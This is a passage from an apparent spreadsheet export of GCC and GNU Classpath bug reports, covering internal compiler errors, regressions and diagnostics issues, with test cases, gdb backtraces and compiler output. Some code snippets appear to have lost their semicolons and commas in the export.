    at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl2.c:1364
1364      tree fn_name = DECL_NAME (function)
(gdb) b compparms
Breakpoint 10 at 0x80bdbd6: file
/home/khan/src/gnu/gcc-3.0/gcc/cp/typeck.c line 1445.
(gdb) c
Continuing.
Breakpoint 10 compparms (parms1=0x40174370 parms2=0x40174078)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/typeck.c:1445
1445      register tree t1 = parms1 t2 = parms2
(gdb) bt
#0  compparms (parms1=0x40174370 parms2=0x40174078)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/typeck.c:1452
&lt;&lt;&lt;&lt; NOTE: parms1 and parms2 are different! Also see note below
&lt;&lt;&lt;&lt; where TREE_VALUE (parms1) and TREE_VALUE (parms2) are different
&lt;&lt;&lt;&lt; so that same_types_p returns 0.
#1  0x809849a in check_classfn (ctype=0x401715b0 function=0x40175888)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl2.c:1432
#2  0x80662f8 in grokfndecl (ctype=0x401715b0 type=0x401717b8
    declarator=0x401640c0 orig_declarator=0x401640c0 virtualp=0
    flags=NO_SPECIAL quals=0x40174320 raises=0x0 check=1 friendp=0
    publicp=1 inlinep=1 funcdef_flag=1 template_count=0
in_namespace=0x0)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl.c:8987
#3  0x806ba2d in grokdeclarator (declarator=0x401640c0
declspecs=0x401742e4
    decl_context=NORMAL initialized=1 attrlist=0x0)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl.c:11605
#4  0x806fc8a in start_function (declspecs=0x401742e4
declarator=0x40167880
    attrs=0x0 flags=0) at /home/khan/src/gnu/gcc-3.0/gcc/cp/decl.c:13334
#5  0x80df16c in begin_function_definition (decl_specs=0x401742e4
    declarator=0x40167880)
    at /home/khan/src/gnu/gcc-3.0/gcc/cp/semantics.c:1614
#6  0x80aabf1 in yyparse_1 () at /usr/lib/bison.simple:804
#7  0x80fd26d in yyparse () at /home/khan/src/gnu/gcc-3.0/gcc/c-lex.c:158
#8  0x81026e3 in compile_file (name=0x844f207 dll-bug2.ii)
    at /home/khan/src/gnu/gcc-3.0/gcc/toplev.c:2369
#9  0x81069c6 in main (argc=2 argv=0xbffff704)
    at /home/khan/src/gnu/gcc-3.0/gcc/toplev.c:4990
(gdb) p parms1
(gdb) pt
 &lt;tree_list 0x40174370 side-effects
    value &lt;pointer_type 0x40175958
                        ^^^^^^^^^^ (1)
        type &lt;record_type 0x40171d00 c readonly type_1 type_5 QI
            size 
            unit size 
            user align 8 symtab 0 alias set -1
            attributes &lt;tree_list 0x401740b4
                purpose &lt;identifier_node 0x40170380 dllexport
                    bindings &gt;&gt;
fields 
            X() X(constX&amp;) this=(X&amp;) n_parents 0 use_template=0
interface-unknown vtable-needs-writing
            member-functions &lt;tree_vec 0x40170f00
                elt 0 
                elt 2 
                elt 3 
                elt 4 
                elt 5 &gt;
            pointer_to_this  reference_to_this
&gt;
        unsigned SI
        size 
        unit size 
        align 32 symtab 0 alias set -1&gt;
    chain &lt;tree_list 0x40163668 tree_2
        value &lt;void_type 0x401656e8 void type_6 VOID
            align 8 symtab 0 alias set -1
            pointer_to_this &gt;&gt;&gt;
(gdb) p parms2
$9 = 0x40174078
(gdb) pt
 &lt;tree_list 0x40174078 side-effects
    value &lt;pointer_type 0x40171958
                        ^^^^^^^^^^ (2) See (1) above.
        type &lt;record_type 0x40171888 c
            type &lt;tree_list 0x40163f28
                purpose &lt;identifier_node 0x40170380 dllexport
                    bindings &gt;&gt;
            readonly type_1 type_5 QI
            size 
            unit size 
            user align 8 symtab 0 alias set -1 fields &lt;type_decl
0x401716e8 c&gt;
            X() X(constX&amp;) this=(X&amp;) n_parents 0 use_template=0
interface-unknown vtable-needs-writing
            member-functions &lt;tree_vec 0x40170f00
                elt 0 
                elt 2 
                elt 3 
                elt 4 
                elt 5 &gt;
            pointer_to_this &gt;
        unsigned SI
        size 
        unit size 
        align 32 symtab 0 alias set -1&gt;
    chain &lt;tree_list 0x40163668 tree_2
        value &lt;void_type 0x401656e8 void type_6 VOID
            align 8 symtab 0 alias set -1
            pointer_to_this &gt;&gt;&gt;
(gdb)
Release:
3.0
Environment:
Cygwin Mingw and other x86-win32 targets. Host independent.
How-To-Repeat:
Just compiling the provided testcase will trigger the problem.</t>
  </si>
  <si>
    <t>GCC-60680</t>
  </si>
  <si>
    <t>unqualified-id expected gcc fails to diagnose and accepts invalid</t>
  </si>
  <si>
    <t>Created attachment 32464
testcase.cpp
int main () {
  int(*) = 0
}
----------------------------------------------------------------------------------
The above compiles but the above is not legal according to any section of the Standard. `clang` correctly throws out a diagnostic saying that the line in question is ill-formed.
There are many variations on the above that gcc happily accepts such as:
`auto(*)(int) = 0` `auto(*)() = 0` etc etc.</t>
  </si>
  <si>
    <t>GCC-1071</t>
  </si>
  <si>
    <t>Internal compiler error in pop_binding at cp/decl.c:1179</t>
  </si>
  <si>
    <t>x.cpp:8: parse error at end of input
x.cpp:8: Internal compiler error in pop_binding at cp/decl.c:1179
Please submit a full bug report.
See  for instructions.
when compiling the attached file (c++ -c x.cpp).
without the last semicolon I get:
x.cpp:7: semicolon missing after declaration of `x::test'
x.cpp:7: parse error at end of input
x.cpp:7: Internal compiler error in pop_binding at cp/decl.c:1179
confused by earlier errors bailing out
Release:
2.97 CVS 2000-12-11
Environment:
i686-pc-linux-gnu
How-To-Repeat:
compile the attached file: c++ -c x.cpp</t>
  </si>
  <si>
    <t>GCC-81223</t>
  </si>
  <si>
    <t>[8 Regression] ICE in instrument_null at gcc/ubsan.c:1230</t>
  </si>
  <si>
    <t>Starting from r249030 we ICE on:
$ cat ice.c
int b
void c ()
void
d ()
{
  struct
  {
    char a[b]
  } e
  c (e)
}
$ gcc -c -fsanitize=alignment ice.c
during GIMPLE pass: ubsan
ice.c: In function â€˜dâ€™:
ice.c:11:1: internal compiler error: Segmentation fault
 }
 ^
0xb923bf crash_signal
	../../gcc/toplev.c:338
0xbb3664 instrument_null
	../../gcc/ubsan.c:1230
0xbb9c0b execute
	../../gcc/ubsan.c:2019</t>
  </si>
  <si>
    <t>GCC-58264</t>
  </si>
  <si>
    <t>incorrect bounds of string when assigned from dereference of function result</t>
  </si>
  <si>
    <t>Created attachment 30713
Minimal Ada source to reproduce the problem
In the source below the function Peek returns a pointer to a (formally)unconstrained String. The actual lower bound of the dynamically allocated String object is 1.
When Peek.all is assigned to an indefinite String variable the dope vector is apparently not copied but the dynamically allocated dope vector is reused. When the dynamically allocated object is then Free'd (including its dope vector) the 'First of the indefinite string object turns to garbage (0).
This only seems to happen for pointer-to-String that are returned by a function call.
----------
with Ada.Text_Io
with Ada.Unchecked_Deallocation
procedure Failure is
  type String_Ptr_T is access String
  procedure Free is new Ada.Unchecked_Deallocation (String String_Ptr_T)
  String_Data : String_Ptr_T := new String'(Hello World)
  function Peek return String_Ptr_T is
  begin
    return String_Data
  end Peek
begin
  declare
    Corrupted_String : String := Peek.all -- Fails
--    Corrupted_String : String := String_Data.all  -- Works
  begin
    Ada.Text_Io.Put_Line(Integer'Image(Corrupted_String'First))
    Free(String_Data)
    Ada.Text_Io.Put_Line(Integer'Image(Corrupted_String'First))
  end
end Failure
----------
elvm1&gt;gnatmake -O0 -g failure.adb -cargs -v -save-temps -Wall -Wextra
gcc-4.6 -c -O0 -g -v -save-temps -Wall -Wextra failure.adb
Using built-in specs.
COLLECT_GCC=/usr//bin/gcc-4.6
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-linux-gnu/4.6/lto-wrapper
Target: i686-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.6.3-1ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --enable-objc-gc --enable-targets=all --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=i686-linux-gnu --host=i686-linux-gnu --target=i686-linux-gnu
Thread model: posix
gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) 
COLLECT_GCC_OPTIONS='-gnatea' '-c' '-O0' '-g' '-v' '-save-temps' '-Wall' '-Wextra' '-gnatez' '-mtune=generic' '-march=i686'
 /usr/lib/gcc/i686-linux-gnu/4.6/gnat1 -gnatwa -quiet -dumpbase failure.adb -auxbase failure -O0 -Wall -Wextra -gnatez -gnatea -g -gnatez -mtune=generic -march=i686 failure.adb -o failure.s
failure.adb:16:05: warning: Corrupted_String is not modified could be declared constant
COLLECT_GCC_OPTIONS='-gnatea' '-c' '-O0' '-g' '-v' '-save-temps' '-Wall' '-Wextra' '-gnatez' '-mtune=generic' '-march=i686'
 as --32 -o failure.o failure.s
COMPILER_PATH=/usr/lib/gcc/i686-linux-gnu/4.6/:/usr/lib/gcc/i686-linux-gnu/4.6/:/usr/lib/gcc/i686-linux-gnu/:/usr/lib/gcc/i686-linux-gnu/4.6/:/usr/lib/gcc/i686-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/i686-linux-gnu/4.6/:/usr/lib/gcc/i686-linux-gnu/4.6/../../../i386-linux-gnu/:/usr/lib/gcc/i686-linux-gnu/4.6/../../../../lib/:/lib/i386-linux-gnu/:/lib/../lib/:/usr/lib/i386-linux-gnu/:/usr/lib/../lib/:/usr/lib/gcc/i686-linux-gnu/4.6/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-gnatea' '-c' '-O0' '-g' '-v' '-save-temps' '-Wall' '-Wextra' '-gnatez' '-mtune=generic' '-march=i686'
gnatbind -x failure.ali
gnatlink failure.ali -O0 -g
elvm1&gt;./failure
 1
 0
As a work around using 
Corrupted_String : String := Peek.all  
helps.</t>
  </si>
  <si>
    <t>hans.buhrer</t>
  </si>
  <si>
    <t>GCC-6240</t>
  </si>
  <si>
    <t>Re: reload1.c failure for sh-elf.  Bootstrap failure on</t>
  </si>
  <si>
    <t xml:space="preserve"> On 8 Apr 2002 NIIBE Yutaka wrote:
 &gt; &gt;Category:       bootstrap
 &gt; &gt;Synopsis:       reload1.c failure for sh-elf.  Bootstrap failure on sh4-unknown-linux-gnu
 &gt; &gt;Confidential:   no
 &gt; &gt;Severity:       serious
 &gt; &gt;Priority:       medium
 &gt; &gt;Class:          sw-bug
 &gt; &gt;Submitter-Id:   net
 &gt; &gt;Originator:     NIIBE Yutaka 
 &gt; &gt;Release:        3.1 20020401 (prerelease)
 &gt; &gt;Environment:
 &gt; (1) host: i386-linux target: sh-elf
 &gt; (2) host=target: sh4-linux 
 &gt; &gt;Description:
 &gt; real.c miscompiles with -O2.
 That's strange. Both GCC from CVS head and GCC 3.1 20020408 build cleanly
 for me for --host=i386-linux --target=sh-elf.
 For some reason I am unable to extract this attachment on this email
 client - can you send it to me at toshiyasu.morita at hsa.hitachi.com?
 Toshi
Release:
unknown
Unformatted:
  sh4-unknown-linux-gnu</t>
  </si>
  <si>
    <t>tm</t>
  </si>
  <si>
    <t>GCC-44780</t>
  </si>
  <si>
    <t>[4.6 regression] Bogus set-but-not-used variable warning</t>
  </si>
  <si>
    <t>Current trunk g++ warns about an set-but-unused variable in the attached testcase:
~/tmp&gt;g++ -v -W -Wall -c -O2 test.cc
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /scratch/martin/gcc/configure --disable-bootstrap --enable-gold --enable-plugins --prefix=/afs/mpa/data/martin/ugcc --with-ppl=/afs/mpa/data/martin/numlibs64 --with-cloog=/afs/mpa/data/martin/numlibs64 --with-libelf=/afs/mpa/data/martin/numlibs64 --enable-languages=c++fortran --enable-target=all --enable-checking=release
Thread model: posix
gcc version 4.6.0 20100701 (experimental) [trunk revision 161665] (GCC) 
COLLECT_GCC_OPTIONS='-v' '-W' '-Wall' '-c' '-O2' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/cc1plus -quiet -v -D_GNU_SOURCE test.cc -quiet -dumpbase test.cc -mtune=generic -march=x86-64 -auxbase test -O2 -W -Wall -version -o /tmp/ccmz9mpH.s
GNU C++ (GCC) version 4.6.0 20100701 (experimental) [trunk revision 161665] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.0 20100628 (experimental) [trunk revision 161485] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
warning: GMP header version 4.3.2 differs from library version 4.3.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/x86_64-unknown-linux-gnu
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/backward
 /usr/local/include
 /afs/mpa/data/martin/ugcc/include
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/include
 /afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.6.0 20100701 (experimental) [trunk revision 161665] (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.6.0 20100628 (experimental) [trunk revision 161485] GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
warning: GMP header version 4.3.2 differs from library version 4.3.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 5f71a12a0438e83fd7b8caa75cf5702d
test.cc: In function '__m128d build_V2DF(long long unsigned int long long unsigned int)':
test.cc:10:8: warning: variable 'tmp' set but not used [-Wunused-but-set-variable]
COLLECT_GCC_OPTIONS='-v' '-W' '-Wall' '-c' '-O2' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 as -V -Qy --64 -o test.o /tmp/ccmz9mpH.s
GNU assembler version 2.19.1 (x86_64-unknown-linux-gnu) using BFD version (GNU Binutils) 2.19.1
COMPILER_PATH=/afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/:/afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/:/afs/mpa/data/martin/ugcc/libexec/gcc/x86_64-unknown-linux-gnu/:/afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/:/afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/
LIBRARY_PATH=/afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/:/afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../lib64/:/lib/../lib64/:/usr/lib/../lib64/:/afs/mpa/data/martin/ugcc/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-W' '-Wall' '-c' '-O2' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
This seems bogus. Other interesting observations:
- current trunk gcc (opposed to g++) does not produce the warning
- the warning is only given for the case with the SSE2 type not for the other case with the more conventional types.
gcc/g++ 4.4.2 and 4.5.* do not issue warnings.</t>
  </si>
  <si>
    <t>GCC-57435</t>
  </si>
  <si>
    <t>[4.8 Regression] Ice on invalid: check_for_ambiguous</t>
  </si>
  <si>
    <t>Created attachment 30205
Minimal test case
When trying to reduce a test-case with delta I stumbled upon this (unrelated) invalid code-snippet that triggers an ICE:
&gt; cat gfortran_check_for_ambiguous.f90
&gt; ~/sys/bin/gfortran gfortran_check_for_ambiguous.f90
gfortran_check_for_ambiguous.f90:4.15:
  use precision
               1
Error: Unexpected USE statement in CONTAINS section at (1)
gfortran_check_for_ambiguous.f90:5.19:
module stressten_rt
                   1
Error: Unexpected MODULE statement in CONTAINS section at (1)
gfortran_check_for_ambiguous.f90:6.15:
  use precision
               1
Error: Unexpected USE statement in CONTAINS section at (1)
f951: internal compiler error: Segmentation fault
0x9b710f crash_signal
        ../.././gcc/toplev.c:333
0x5b4f13 check_for_ambiguous
        ../.././gcc/fortran/module.c:4535
0x5b4f13 read_module
        ../.././gcc/fortran/module.c:4731
0x5b4f13 gfc_use_module
        ../.././gcc/fortran/module.c:6406
0x5b73d3 gfc_use_modules()
        ../.././gcc/fortran/module.c:6530
0x5bc267 use_modules
        ../.././gcc/fortran/parse.c:86
0x5bdaf4 decode_statement
        ../.././gcc/fortran/parse.c:301
0x5bedf4 next_free
        ../.././gcc/fortran/parse.c:784
0x5bedf4 next_statement
        ../.././gcc/fortran/parse.c:977
0x5c165f parse_contained
        ../.././gcc/fortran/parse.c:4006
0x5c159e parse_progunit
        ../.././gcc/fortran/parse.c:4192
0x5c212a gfc_parse_file()
        ../.././gcc/fortran/parse.c:4597
0x5fe5a5 gfc_be_parse_file
        ../.././gcc/fortran/f95-lang.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
&gt;
The gfortran version I used was a self-compiled version from trunk:
&gt; ~/sys/bin/gfortran --version
GNU Fortran (GCC) 4.9.0 20130517 (experimental)
Copyright (C) 2013 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
It also seems to trigger an ICE in 4.8.0 but behaves correctly in 4.7.2.</t>
  </si>
  <si>
    <t>GCC-37870</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in extract_bit_field_1</t>
  </si>
  <si>
    <t>Reproducing this is easy.
cat &gt; ICE.sample.c &lt;&lt;'EOF'
typedef unsigned int size_t
extern void *memcpy (void *__restrict __dest
       __const void *__restrict __src size_t __n)
     __attribute__ ((__nothrow__)) __attribute__ ((__nonnull__ (1 2)))
unsigned xxx(long double arg)
{
        struct
        {
                char dummy[8]
                unsigned yyy:7
        } copy
        memcpy(
        return copy.yyy
}
EOF
invoking 'gcc -c -O1 sample.c' then emits
/home/bernard/ICE.sample.c: In function â€˜xxxâ€™:
/home/bernard/ICE.sample.c:8: internal compiler error: in extract_bit_field_1 at expmed.c:1271
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is quite sensitive!  Small changes make the ICE
go away.  These include
 using -O0
 re-sizing the array member dummy[] in the struct
 Replacing the memcpy() with an assignment via a
    cast pointer:
       give the struct a tag (e.g. struct fimbulwinter)
       copy = *((struct fimbulwinter *)&amp;arg)
 renaming memcpy() at both occurrences to by-pass the built-in
The last is suggestive no?
This is NOT a duplicate of bug 37269 though the ICE is reported from
the same function.  I get the same behaviour after applying Andrew
Pinski's patch for that bug.  In fact I found this bug in an echt
4.3.1 bootstrap build applied AP's patch still had it then used
that compiler to bootstrap a 4.3.2 build also with AP's patch.
Even using xgcc/cc1 from the stage 1 boostrap build of 4.3.2
showed the bug (there was nothing extra interesting in the
diagnostics produced).
'configure' was invoked with
'../gcc-4.3.2/configure' '--prefix=/usr' '--libexecdir=/usr/lib' '--infodir=/usr/share/info' '--mandir=/usr/share/man' '--enable-libada' '--enable-libssp' '--disable-werror' '--with-mpfr=/usr' '--with-gmp=/usr' '--with-datarootdir=/usr/share' '--with-docdir=/usr/share/gcc-4.3.2/doc' '--with-pdfdir=/usr/share/gcc-4.3.2/doc' '--with-htmldir=/usr/share/gcc-4.3.2/doc/html' '--disable-coverage' '--enable-nls' '--enable-__cxa_atexit' '--enable-decimal-float' '--disable-fixed-point' '--enable-threads=posix' '--enable-clocale=gnu' '--enable-shared' '--disable-intermodule' '--enable-languages=adac++fortranjavaobjcobj-c++treelangc' '--with-local-prefix=/usr' '--with-gnu-ld' '--with-demangler-in-ld' '--with-gnu-as' '--with-system-libunwind' '--with-system-zlib' '--enable-bootstrap'
All those single quotes derive from my build scripts which quote-and-
escape everything in sight.  The actual CPU is an Athlon64 X2 5600+
(the 2.9GHz flavour not the 2.8GHz flavour).
My binutils are from release 2.18 built with an unpatched gcc-4.3.1 .</t>
  </si>
  <si>
    <t>GCC-12719</t>
  </si>
  <si>
    <t>Variables declaration can be anywhere.</t>
  </si>
  <si>
    <t>Did not tested with 3.3.1 and 3.3.2 but looking to the ChangeLog it seems not
modified.
With my gcc 3.3 I can compile this:
    ...
    WordLstNode *node
    N = word_list_size(WL1)
    Dictionary* dic = dictionary_new(N)
    ...</t>
  </si>
  <si>
    <t>albie</t>
  </si>
  <si>
    <t>CLASSPATH-26761</t>
  </si>
  <si>
    <t>exception when parsing xml comments</t>
  </si>
  <si>
    <t>When I parse the attached xml file with jamvm/classpath cvs I get this exception:
gnu.ldml.ParseException: Error reading XML source file file:/home/mkoch/src/classpath-locales/cldr-1.3.0/common/main/ga.xml
   at gnu.ldml.Analyzer.addResourceFile (Analyzer.java:120)
   at gnu.ldml.Analyzer. (Analyzer.java:74)
   at gnu.localegen.Main.main (Main.java:63)
Caused by: org.xml.sax.SAXParseException: illegal XML character: U+fffd
   at gnu.xml.stream.SAXParser.parse (SAXParser.java:660)
   at gnu.ldml.Parser.parse (Parser.java:719)
   at gnu.ldml.Analyzer.addResourceFile (Analyzer.java:116)
   ...2 more
Caused by: javax.xml.stream.XMLStreamException: illegal XML character: U+fffd
   at gnu.xml.stream.XMLParser.error (XMLParser.java:4053)
   at gnu.xml.stream.XMLParser.readUntil (XMLParser.java:1379)
   at gnu.xml.stream.XMLParser.readComment (XMLParser.java:2926)
   at gnu.xml.stream.XMLParser.next (XMLParser.java:1158)
   at gnu.xml.stream.XMLParser.hasNext (XMLParser.java:984)
   at gnu.xml.stream.SAXParser.parse (SAXParser.java:377)
   ...4 more
When I remove all comments from the xml file all works well.</t>
  </si>
  <si>
    <t>GCC-2093</t>
  </si>
  <si>
    <t>Internal compiler error emitting DWARF2 for nested functions</t>
  </si>
  <si>
    <t>powerpc-sysv4-gcc -v -O2 -gdwarf-2   -c -o xx.o xx.c
Reading specs from /usr/local/lib/gcc-lib/powerpc-sysv4/3.1/specs
Configured with: ../configure --target=powerpc-sysv4 --enable-languages=c
gcc version 3.1 20010225 (experimental)
 /usr/local/lib/gcc-lib/powerpc-sysv4/3.1/cc1 -lang-c -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -DPPC -Dunix -D__svr4__ -D__PPC__ -D__unix__ -D__svr4__ -D__PPC -D__unix -Asystem=unix -Asystem=svr4 -Acpu=powerpc -Amachine=powerpc -D__CHAR_UNSIGNED__ -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -D_CALL_SYSV -D_BIG_ENDIAN -D__BIG_ENDIAN__ -Amachine=bigendian -D_ARCH_PPC xx.c -quiet -dumpbase xx.c -gdwarf-2 -O2 -version -o /tmp/cc56wEjM.s
GNU CPP version 3.1 20010225 (experimental) (cpplib) (PowerPC System V.4)
GNU CPP version 3.1 20010225 (experimental) (cpplib) (PowerPC System V.4)
GNU C version 3.1 20010225 (experimental) (powerpc-sysv4)
	compiled by GNU C version 3.1 20010225 (experimental).
ignoring nonexistent directory /usr/local/powerpc-sysv4/sys-include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc-lib/powerpc-sysv4/3.1/include
 /usr/local/powerpc-sysv4/include
End of search list.
xx.c: In function `foo':
xx.c:19: Internal compiler error in gen_subprogram_die at dwarf2out.c:10128
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
gcc version 3.1 20010225 (experimental)
Environment:
Host Debian GNU/Linux 2.2 i386
Configured with: ../configure --target=powerpc-sysv4 --enable-languages=c
How-To-Repeat:
int foo (int a)
{
  int n
  int boo () { return 0 }
  while (1)
    {
      if (a &gt; 0)
        {
          if ((n = baz (a)) &lt; 0)
            return n
        }
      if (!n)
        break
    }
  return n + bar ()
}</t>
  </si>
  <si>
    <t>velco</t>
  </si>
  <si>
    <t>GCC-14397</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] Access check for wrong copy constructor</t>
  </si>
  <si>
    <t>The following code t.C taken from the file pointers/truletest.cpp from the 
book C++ Templates - The Complete Guide by David Vandevoorde and Nicolai M. 
Josuttis does no longer compile. It worked when last tried approximately a 
week ago. gcc 3.3 accepts this code without a problem. 
I appologize if this is a bogus bug report. 
source code 
t.C  
/* The following code example is taken from the book 
 * C++ Templates - The Complete Guide 
 * by David Vandevoorde and Nicolai M. Josuttis Addison-Wesley 2002 
 * 
 * (C) Copyright David Vandevoorde and Nicolai M. Josuttis 2002. 
 * Permission to copy use modify sell and distribute this software 
 * is granted provided this copyright notice appears in all copies. 
 * This software is provided as is without express or implied 
 * warranty and with no claim as to its suitability for any purpose. 
 */ 
#include holder2.hpp 
#include trule.hpp 
class Something { 
} 
void read_something (Something* ) 
{ 
} 
Trule load_something()  
{ 
    Holder result(new Something) 
    read_something(result.get()) 
    return result 
} 
int main()  
{ 
    Holder ptr(load_something()) 
    //... 
} 
Compiling t.C 
g++ -v -W -Wall t.C -save-temps 
Reading specs from /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/specs 
Configured with: ../gcc/configure --enable-threads=posix --enable-languages=cc
++f77objc --enable-__cxa_atexit --enable-libstdcxx-debug 
Thread model: posix 
gcc version 3.4.0 20040302 (prerelease) 
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4.0/cc1plus -E -quiet -v 
-D_GNU_SOURCE t.C -mtune=pentiumpro -W -Wall -o t.ii 
ignoring nonexistent directory NONE/include 
ignoring nonexistent directory /usr/local/lib/gcc/
i686-pc-linux-gnu/3.4.0/../../../../i686-pc-linux-gnu/include 
#include ... search starts here: 
#include  search starts here: 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0/
i686-pc-linux-gnu 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/../../../../include/c++/3.4.0/
backward 
 /usr/local/include 
 /usr/local/lib/gcc/i686-pc-linux-gnu/3.4.0/include 
 /usr/include 
End of search list. 
 /usr/local/libexec/gcc/i686-pc-linux-gnu/3.4.0/cc1plus -fpreprocessed t.ii 
-quiet -dumpbase t.C -mtune=pentiumpro -auxbase t -W -Wall -version -o t.s 
GNU C++ version 3.4.0 20040302 (prerelease) (i686-pc-linux-gnu) 
	compiled by GNU C version 3.4.0 20040302 (prerelease). 
GGC heuristics: --param ggc-min-expand=64 --param ggc-min-heapsize=64274 
trule.hpp: In function `Trule load_something()': 
trule.hpp:42: error: `Trule::Trule(Trule&amp;) [with T = Something]' is 
private 
t.C:25: error: within this context 
t.C:25: error:   initializing temporary from result of 
`Trule::Trule(Holder&amp;) [with T = Something]' 
trule.hpp: In function `int main()': 
trule.hpp:42: error: `Trule::Trule(Trule&amp;) [with T = Something]' is 
private 
t.C:30: error: within this context 
Compilation exited abnormally with code 1 at Tue Mar  2 21:45:22</t>
  </si>
  <si>
    <t>GCC-23332</t>
  </si>
  <si>
    <t>FIXME in tree-profile.c: tree_gen_const_delta_profiler not implemented</t>
  </si>
  <si>
    <t>static void 
tree_gen_const_delta_profiler (histogram_value value ATTRIBUTE_UNUSED
                                unsigned tag ATTRIBUTE_UNUSED
                                unsigned base ATTRIBUTE_UNUSED)
{
  /* FIXME implement this.  */
#ifdef ENABLE_CHECKING
  internal_error (unimplemented functionality)
#endif
  gcc_unreachable ()
}
bug to track progress on this FIXME.</t>
  </si>
  <si>
    <t>GCC-37814</t>
  </si>
  <si>
    <t>M68k/Coldfire ICE with -O: insn does not satisfy its constraints</t>
  </si>
  <si>
    <t>Compile the below (cut-down) testcase with:
m68k-elf-gcc -c fptest.c -mcpu=5282 -fomit-frame-pointer -O
(gcc 4.3.2) and you will get:
-=-=-=-=-=-
fptest.c: In function â€˜do_testâ€™:
fptest.c:21: error: insn does not satisfy its constraints:
(insn 31 114 32 2 fptest.c:11 (set (reg:SI 8 %a0 [62])
        (plus:SI (plus:SI (mult:SI (reg/f:SI 15 %sp)
                    (const_int 4 [0x4]))
                (reg:SI 9 %a1))
            (const_int 128 [0x80]))) 451 {*lea} (nil))
fptest.c:21: internal compiler error: in reload_cse_simplify_operands at postreload.c:395
-=-=-=-=-=-
The testcase has been trimmed down such that just about any further change or change in the command line args makes it disappear. An earlier (larger) version closer to the original code would also fail at -O2 and -O3.
-=-=-=-=-=-=-=-=-=-=-=-
static double fpt3_values[100]
void do_test( void )
{
    int count = 100
    int loops = 200
    double *values = fpt3_values
    unsigned int i j
    volatile double sum = 0.0
    unsigned int seed
    seed = ((unsigned int)
    for( i = 0 i &lt; count i++ )
        values[i] = (double)seed
    for( j = 0 j &lt; loops  j++ )
    {
        for( i = 0 i &lt; count i++ )
            sum += (((values[i%count])*(values[(i+1)%count])))
    }
}</t>
  </si>
  <si>
    <t>GCC-60370</t>
  </si>
  <si>
